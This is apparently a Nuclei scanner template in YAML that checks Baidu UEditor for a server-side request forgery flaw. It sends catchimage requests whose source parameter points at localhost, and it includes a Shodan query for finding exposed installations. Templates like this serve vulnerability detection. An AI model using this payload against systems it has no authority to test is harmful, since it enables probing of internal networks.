44 lines
1.2 KiB
YAML
44 lines
1.2 KiB
YAML
id: ueditor-ssrf
|
|
|
|
info:
|
|
name: UEditor - Server Side Request Forgery
|
|
author: pwnhxl
|
|
severity: medium
|
|
description: UEditor contains an Server Side Request Forgery vulnerability.
|
|
reference:
|
|
- https://xz.aliyun.com/t/4154
|
|
- https://www.seebug.org/vuldb/ssvid-97311
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: html:"UEditor"
|
|
product: ueditor
|
|
vendor: baidu
|
|
tags: ueditor,ssrf
|
|
|
|
classification:
|
|
cpe: cpe:2.3:a:baidu:ueditor:*:*:*:*:*:*:*:*
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png"
|
|
- "{{BaseURL}}/ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '\u94fe\u63a5\u4e0d\u53ef\u7528'
|
|
- '"original":'
|
|
- '"SUCCESS"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022034a2ccb1f146bbff39753d4c528f61104f9338c229ca80ce3d1d4895147c79ba02210082745015da69b50bc88d075fac2062fe2732be6a2217350bbc8cb1415be6b272:922c64590222798bb761d5b6d8e72950
|